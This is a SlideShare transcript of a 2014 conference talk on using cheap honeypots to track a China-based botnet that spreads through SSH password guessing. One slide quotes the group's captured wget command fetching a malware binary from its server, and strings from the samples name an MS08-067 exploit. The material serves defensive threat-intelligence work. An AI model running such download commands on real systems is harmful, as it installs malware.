SlideShare a Scribd company logo

BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap

A
Andrew Morris

This document summarizes how to track threat actors on a budget by setting up honeypots to monitor attacks. It describes tracking a group in China that spreads malware via SSH passwords. Samples of the group's malware were analyzed, revealing DNS servers and routers as targets for DDoS attacks. The communication protocol was reversed to identify targets in real-time. This provided insights into the group's operations and infrastructure to block.

Data & Analytics
1 of 59
Download to read offline
Ballin on a Budget Tracking Chinese threat actors on the cheap Andrew Morris
a/s/l? • Andrew Morris • Security Engineer, iSEC Partners • Twitter - @Andrew___Morris • Email - andrew@morris.guru
Overview • I’m going to tell you how I tracked a group of threat actors • I’m going to show you how you can too
Part 1: background
wtf is threat intel • Gathering intelligence on your adversaries (or bad guys in general) • Predicting and preventing attacks before they happen
Lots of companies do it
We can too!
What we can’t do • As ballers on budgets, we don’t have access to a lot of good data • I’m assuming we do not have access to IR artifacts from targeted compromises • So we’re going to focus on mass attacks targeting the entire internet • We’re only going to track dumb groups with poor opsec • Today we’ll focus on a group that spreads malware via crappy SSH passwords
How do you threat intelligence? • Set up a network of vulnerable machines exposed to the internet • Monitor them for attacks • Aggregate data • Locate, secure, and analyze artifacts • Locate key adversary infrastructure • ?????? • Profit!
How to ball, on a budget • Setting up infrastructure - honeypots • Monitoring attacks - management interface, log review • Locating a group of attackers - Scraping their web servers • Figuring out who they are - Analyzing capabilities, correlating data, securing artifacts • Tracking their targets - Get creative! • Implementing defenses - Firewall rules, indicators, TTP write-ups
Quick Malware Primer • Most malware uses the conventional C2 (command and control) model • Lots of botnets are used to perform DDOS (distributed denial of service) attacks
Our targets • Guess passwords via SSH • uname -a • wget malware.run
Step 2: Setting up Infrastructure
Honeypots!
What is a honeypot? • An intentionally vulnerable server or application that serves no business purpose • It’s only purpose is to attract attention of attackers
Step 1 - Cheap Hosting • CloudAtCost • Pros: CHEAP - $35 dollar one time fee for a machine FOREVER • Cons: Crappy uptime, slow, unreliable
Step 1.1 - OPSEC • Don’t reuse passwords • Don’t put any data on the machine • Don’t put anything personally identifiable on the machine • Assume the machine will be compromised at any moment
Step 2 - Management • ThreatStream released an awesome open source centralized honeypot monitor called MHN (Managed Honey Network) • Looks like this
Kippo • SSH Honeypot • Can record attacker sessions • Can grab artifacts attackers attempt to download with wget • Configure certain usernames and passwords
Let the attacks begin!
Data Analytics: Ballin on a Budget style # grep 'login attempt' * | cut -d' ' -f9 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 passwords being used against your infrastructure?
Data Analytics: Ballin on a Budget style (cont’d) # grep SSHService * | cut -d']' -f1 | cut -d',' -f3 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 attacker IP addresses
Tracker Real-time Alerting analytics: Ballin on a budget style https://github.com/andrew-morris/tracker/
Quick recap • We learned what threat intel is • We learned how to set up and operate infrastructure
Part 3: Locating the Group
Successful Logins with Kippo
root@mgmt.muXXXXXXXXX.com:~# wget -O /etc/run_second=$q http://60.173.X.X:8080/14.17 --2014-08-07 10:25:11-- http:///etc/run_second=$q Connecting to None:80... connected. HTTP request sent, awaiting response... Credit to MalwareMustDie
• Do some internet recon to see if anyone’s seen the binaries before • Search Google, VirusTotal, Malwr, etc for the md5 • That being said… this still gets me giddy
what if I suck at reversing tho
It’s all good!
Malware Analysis: Ballin on a budget style • Use malwr.com and virustotal.com
Part 4: CHUILANG aka a group I’ve been tracking
Who I’m working on • I was getting hit a lot by a particular group • I secured some of their malware samples
something something China
1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit 14.17: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped 183.60: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped 445.rar: RAR archive data, v1d, os: Win32 5900.rar: RAR archive data, v1d, os: Win32 Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped L24_36000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped SSHSecureShellClient-3[1][1].2.9.zip: Zip archive data, at least v2.0 to extract elf: directory elf.tar.gz: POSIX tar archive (GNU) putty.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit tcpwra: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xpoer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xsyer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped ºì³¾Íø°²445Éø͸¹¤¾ß°ü.rar: RAR archive data, v1d, os: Win32 命令提示符.exe 入侵前需要 启的服务.bat FTP下载命令.txt SMB Connect OK! Make SMB Connection error:%d MS08-067 Exploit for CN by EMM@ph4nt0m.org %sIPC$ pipebrowser EMM! B041
Reversing • Reversing this malware is a talk in itself • I suck at reversing so don’t listen to anything I tell you • I’ll post the IDB files on my github soon • Sometimes you don’t have to reverse anything
Analysis Dropped a couple other binaries Added itself to startup The usual Contained DDOS capability Function names like “SYNFLOOD”, “UDPFLOOD”, etc
Traffic I see…. IP addresses?
Lots of IPs
# geo [+] IP Address: 202.102.199.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 218.104.78.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.138.180.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.91.88.129 Country: China Region: 22 City: Beijing Coordinates: 39.92890,116.38830 [+] IP Address: 202.38.64.1 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 58.242.2.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.200.101 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.213.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.192.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 61.132.163.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 andrew$ geo 8.8.8.8 [+] IP Address: 8.8.8.8 Country: United States Region: CA City: Mountain View Coordinates: 37.38600,-122.08380 Geographical Correlation Engine: Ballin on a budget style
Who are these IPs? CartoDB is AWESOME
What are they? • DNS servers • Backbone routers • Etc
C2 traffic • Those IPs were their DDOS targets • They were blasting instructions from the C2 • Let’s build our own client!
Step 1: Spend hours staring at Wireshark Step 2: Try not to kill yourself
What the code looks like https://github.com/andrew-morris/chuilang2014_emulate/
What the code does
Honeypot > Identifying threats > Tracking targets
Recap! • We’ve captured malware • Analyzed it to identify capabilities • Reversed the protocol to identify the groups targets in real time
Closing Notes
End result? • Real-time tracking of the group’s targets, as they target them • Malware artifacts • C2 IP addresses to block from your network
Summary of the Group • Based in China • Not advanced • Use easily guessable credentials and 6 year old exploits (MS08_067) • Goals: Build botnet to DDOS people • Somewhat smart about targeting
Closing Notes The majority of this intel was gathered from one piece of malware from one campaign There are lots of these campaigns and attacks occurring at any moment You just need to find them
TO DO! • Track more of these C2s • Figure out how to identify other compromised clients • Setup automated notification system to alert admins that they will be targeted • Setup live-updating map of their targets
• Threat intelligence isn’t that hard • It’s easy to ball on a budget • Get out there and track some targets! • Don’t forget to share your info!
Credit • MalwareMustDie - @malwaremustdie • Cartodb - cartodb.com • Malwr - malwr.com • VirusTotal - virustotal.com • CloudAtCost - cloudatcost.com • ThreatStream MHN - github.com/threatstream/mhn • Rob Blody (gir489) for helping me reverse some malware samples • Nat Puffer for getting me interested in this stuff
Thank you! Andrew Morris @Andrew___Morris andrew@morris.guru

Recommended

Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Andrew Morris
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
Andrew Morris
 
Weekend Malware Research 2012
Weekend Malware Research 2012Weekend Malware Research 2012
Weekend Malware Research 2012
Andrew Morris
 
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Andrew Morris
 
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Andrew Morris
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the Internet
Andrew Morris
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSH
Andrew Morris
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
 

Recommended

Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Andrew Morris
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
Andrew Morris
 
Weekend Malware Research 2012
Weekend Malware Research 2012Weekend Malware Research 2012
Weekend Malware Research 2012
Andrew Morris
 
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Andrew Morris
 
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Andrew Morris
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the Internet
Andrew Morris
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSH
Andrew Morris
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
John Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
Greg Foss
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
EC-Council
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
EC-Council
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
John Bambenek
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat Security Conference
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Jack Shaffer
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
Chi En (Ashley) Shen
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Lastline, Inc.
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat Security Conference
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
John Bambenek
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
Greg Foss
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?
Aaron Lancaster
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
 

More Related Content

What's hot

ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
John Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
Greg Foss
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
EC-Council
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
EC-Council
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
John Bambenek
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat Security Conference
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Jack Shaffer
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
Chi En (Ashley) Shen
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Lastline, Inc.
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat Security Conference
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
John Bambenek
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
Greg Foss
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?
Aaron Lancaster
 

What's hot (20)

ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?
 

Similar to BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap

ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
Stephan Chenette
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
MuhammadRehan856177
 
CH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdfCH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdf
WajdiElhamzi3
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
Deepanshu Gajbhiye
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
APNIC
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
Andrew McNicol
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
baabtra.com - No. 1 supplier of quality freshers
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
Q Fadlan
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptx
malikmuzammil2326
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUPWill Pearce
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Eric Vanderburg
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent Threats
ESET
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Neel Pathak
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
Satria Ady Pradana
 

Similar to BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap (20)

Malware analysis
Malware analysisMalware analysis
Malware analysis
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
CH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdfCH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdf
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
